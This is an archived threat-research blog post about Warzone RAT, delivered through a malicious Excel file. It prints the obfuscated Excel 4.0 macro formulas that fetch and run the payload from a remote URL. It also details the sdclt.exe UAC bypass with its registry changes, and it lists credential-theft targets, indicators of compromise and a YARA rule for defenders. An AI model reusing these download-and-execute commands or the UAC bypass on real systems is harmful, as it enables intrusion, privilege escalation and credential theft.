{
	"id": "0588b57d-45dc-4638-a098-ff18cd9fb37c",
	"created_at": "2026-04-06T00:08:42.516316Z",
	"updated_at": "2026-04-10T13:12:46.816505Z",
	"deleted_at": null,
	"sha1_hash": "ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6",
	"title": "Warzone RAT Comes With UAC Bypass Technique",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1572021,
	"plain_text": "Warzone RAT Comes With UAC Bypass Technique\r\nBy Abhijit Mohanta\r\nPublished: 2020-11-25 · Archived: 2026-04-05 15:57:45 UTC\r\nUptycs' threat research team identified an XLS document that downloaded a highly vicious payload named\r\nWarzone RAT. The payload, also known as “Ave Maria stealer,” can steal credentials and log keystrokes on the\r\nvictim’s machine. Checkpoint mentioned Warzone early this year when the malware was in its early stage of\r\ndevelopment.\r\nThe latest version of the malware is fully developed and is being sold in the underground market. The Warzone\r\nauthors have an official website where cybercriminals can buy the malware.\r\nThe site lists various features of the RAT and the pricing (the RAT can be rented for $22.95 per month and $49.95\r\nfor three months).\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 1 of 13\n\nFigure 1: Warzone RAT official website.\r\nThe Warzone developers rent out several products on their website:\r\nRAT\r\nRAT Poison\r\nCrypter\r\nSILENT.doc exploit\r\nSILENT EXCEL Exploit\r\nHere are various features of the RAT noted on the website:\r\nNative, independent stub\r\nRemote Desktop\r\nHidden Remote Desktop - HRDP\r\nPrivilege Escalation - UAC Bypass\r\nRemote WebCam\r\nPassword Recovery\r\nFile Manager\r\nDownload \u0026 Execute\r\nLive Keylogger\r\nOffline Keylogger\r\nRemote Shell\r\nProcess Manager\r\nReverse Proxy\r\nAutomatic Tasks\r\nMass Execute\r\nSmart Updater\r\nHRDP WAN Direct Connection\r\nPersistence\r\nWindows Defender Bypass\r\nWe also discovered a cracked version of Warzone hosted on GitHub. Here’s a screenshot of the repo:\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 2 of 13\n\nFigure 2: A cracked version of Warzone on GitHub.\r\nThe instance of Warzone we trapped has the ability to bypass UAC on the latest version of Windows 10. In this\r\nblog we’re going to talk about the XLS used as the attack vector and the UAC bypass technique used.\r\nThe Malicious XLS\r\nThe XLS used in the attack uses Excel 4.0 Macro, also known as XLM Macro. The XLM Macro feature has been\r\npart of Microsoft Excel for a long time, but we’ve seen a spike in its malicious usage for a few months now.\r\nMalware authors exploit this feature of Excel, which allows formulas to be written using macros.\r\nWhen we got hold of the XLS on November 11, only a few of the anti-malware vendors could detect it on\r\nVirustotal (see figure 3).\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 3 of 13\n\nFigure 3: Detections on Virustotal.\r\nIn the XLS file, the macros are implemented as formulas in a hidden sheet and are not visible if the XLS is\r\nopened. The macros are visible only after unhiding the sheet. The following screenshot shows the unhidden sheet\r\nwith macro code embedded in the formula.\r\nFigure 4: Macro in unhidden sheet.\r\nHere’s the macro code in respective rows and columns:\r\nRow 596 column E -\r\n=CHAR(99)\u0026CHAR(109)\u0026CHAR(100)\u0026CHAR(32)\u0026CHAR(47)\u0026CHAR(99)\u0026\"powe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile').\"\"\"\"Invoke\"\"\"\"('https://cutt.ly/agJgRCy','gm.exe')\"\r\nRow 597 column E -\r\n=CHAR(99)\u0026CHAR(109)\u0026CHAR(100)\u0026CHAR(32)\u0026CHAR(47)\u0026CHAR(99)\u0026\"powe^rshell -w 1\r\nstARt`-slE`Ep 20; Move-Item \"\"gm.exe\"\" -Destination \"\"${enV`:appdata}\"\"\"\r\nRow 598 column E -\r\n=CHAR(99)\u0026CHAR(109)\u0026CHAR(100)\u0026CHAR(32)\u0026CHAR(47)\u0026CHAR(99)\u0026\"powe^rshell -w 1\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 4 of 13\n\nstARt`-slE`Ep 25; cd ${enV`:appdata}; ./gm.exe\"\r\nThese macros are responsible for downloading and executing the Warzone RAT. The Warzone payload takes full\r\ncontrol of the system after bypassing UAC and then steals information and monitors the victim’s machine.\r\nHere’s the flow of the attack:\r\nThe macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT\r\nGm.exe bypasses UAC to run at high integrity level\r\nGm.exe copies itself to %programdata% with the name Images.exe and then executes it. Images.exe runs at\r\nhigh integrity level\r\nThe image below describes the flow of the attack.\r\nFigure 5: The flow of attack.\r\nThe Warzone RAT Payload: Win Over the UAC\r\nThe Warzone RAT (gm.exe) is a 32-bit application and uses the sdclt.exe to bypass UAC and run at higher\r\nprivileges. Sdclt.exe is a built-in Windows utility used for backup and restore purposes. Sdclt is designed to\r\nautoevelate its privilege and uses the control panel binary, control.exe, to back up and restore control panel\r\nsettings.\r\nThere are many UAC bypass techniques that are not effective on Windows 10 because of the default file system\r\nrestrictions. A 32-bit application can’t access the native c:\\windows\\system32 directory because the operating\r\nsystem redirects the request to c:\\windows\\SysWOW64. Sdclt.exe and other UAC bypass binaries are 64-bit\r\napplications and are not available in the SysWOW64 directory.\r\nHowever, the operating system provides a mechanism to disable the file system redirection using\r\nWow64DisableWow64FsRedirection API. So Warzone uses the Wow64DisableWow64FsRedirection API to\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 5 of 13\n\ndisable the file system redirection to access the sdclt.exe that resides in the system32 directory (see figure 6,\r\nbelow).\r\nFigure 6: The call to the Wow64DisableWow64FsRedirection API disables file system redirection for a 32-bit\r\napplication.\r\nAfter disabling the redirection, the malware makes the following registry changes:\r\nCreates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command\r\nSets the “Default” value to “path of the malware”\r\nCreates a value “DelegateExecute” and sets the value to “0”\r\nExecutes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7)\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 6 of 13\n\nFigure 7: The malware sets registry keys and calls sdclt.exe to bypass UAC.\r\nThis step elevates the privilege of the malicious process and executes it at high integrity as shown in the image\r\nbelow (figure 8).\r\nFigure 8: Images.exe runs at a higher integrity level.\r\nThe Warzone RAT can steal passwords from the following browsers:\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 7 of 13\n\nGoogle Chrome\r\nEpic Privacy Browser\r\nMicrosoft Edge\r\nOpera\r\nTencent QQ Browser\r\nBrave Browser\r\nCenterBrowser\r\nBlisk\r\nTorch Browser\r\nSlimjet browser\r\nIt steals the passwords that are stored in the browser databases. The following screenshot (figure 9) shows the\r\nquery used to extract saved credentials in the browser.\r\nFigure 9: RAT stealing passwords from the browser.\r\nThe Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image\r\nbelow (figure 10).\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 8 of 13\n\nFigure 10: RAT stealing passwords from email clients.\r\nThe RAT also has a keylogger component that uses the GetAsyncState Windows API to log keystrokes (see figure\r\n11).\r\nFigure 11: Keylogger code using GetAsyncState API.\r\nThe following screenshot (figure 12) shows the part of keylogger code that handles the logging of special keys\r\nTAB, BKSP, ESC, CAPS, CTRL, etc.\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 9 of 13\n\nFigure 12: Keylogger code to handle special keys.\r\nHere are some more strings that can be used to identify and detect the unpacked Warzone payload inside memory:\r\nwarzone160\r\nAve_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper\r\nC:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe\r\nUptycs EDR Detection\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 10 of 13\n\nFigure 13: Uptycs alerts.\r\nFigure 14: Uptycs process graph.\r\nMalware authors are always hunting for techniques that can bypass security. As mentioned earlier, the UAC\r\nbypass technique used by Warzone works on the latest version of Windows 10.\r\nWe are seeing an increase in usage of the technique. In our intelligence database we have encountered some\r\nadditional malware that uses the same technique to bypass UAC. Below is a screenshot (figure 15) of a VBA\r\nmacro code found in an .xlsm sample (SHA256-\r\n70d400cbacc02f2417e742608c626c52698b07a42de3eb6e1ff4fea17d5bc0b6) using the API.\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 11 of 13\n\nFigure 15: VBA macro using Wow64DisableWoW64FsRedirection API.\r\nIndicator of Compromise\r\nSHA256\r\nXLS-401634497f93067541d5d5a7d7511f7486684b2076034f8d5b205a274750e90b\r\nWarZone RAT-55ff46cb70e9b4a326776e45a540e48166d04463c4f91de117528e487ce62b2c\r\nFiles Dropped\r\n%AppData%gm.exe\r\n%ProgramData%Images.exe\r\nRegistry Changes\r\n1. Key: HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue Images data: %programdata%images.exe\r\n2. Key: HKCU\\Software\\Classes\\Folder\\shell\\open\\command\r\nValue: Default data: %appdata%gm.exe\r\nValue: DelegateExecute data: 0\r\nURLs\r\nhxxps://cutt.ly/agJgRCy/gm.exe\r\nYARA Rule\r\nrule Warzone_RAT {\r\n meta:\r\n description=\"warzone RAT -Memory\"\r\n author = \"abhijit mohanta\"\r\n date = \"15 Oct 2020\"\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 12 of 13\n\nstrings:\r\n $Warzone0 = \"warzone160\" ascii wide nocase\r\n $Warzone1 = \"[ENTER]\" ascii wide nocase\r\n $Warzone2 = \"[BKSP]\" ascii wide nocase\r\n $Warzone3 = \"[TAB]\" ascii wide nocase\r\n $Warzone4 = \"[CTRL]\" ascii wide nocase\r\n $Warzone5 = \"[ALT]\" ascii wide nocase\r\n $Warzone6 = \"[CAPS]\" ascii wide nocase\r\n $Warzone7 = \"[ESC]\" ascii wide nocase\r\n $Warzone8 = \"[INSERT]\" ascii wide nocase\r\n condition:\r\n all of ($Warzone*)\r\n}\r\nThanks to Shilpesh Trivedi and the rest of the Uptycs threat research team for their contributions.\r\nSource: https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique"
	],
	"report_names": [
		"warzone-rat-comes-with-uac-bypass-technique"
	],
	"threat_actors": [],
	"ts_created_at": 1775434122,
	"ts_updated_at": 1775826766,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6.pdf",
		"text": "https://archive.orkl.eu/ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6.txt",
		"img": "https://archive.orkl.eu/ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6.jpg"
	}
}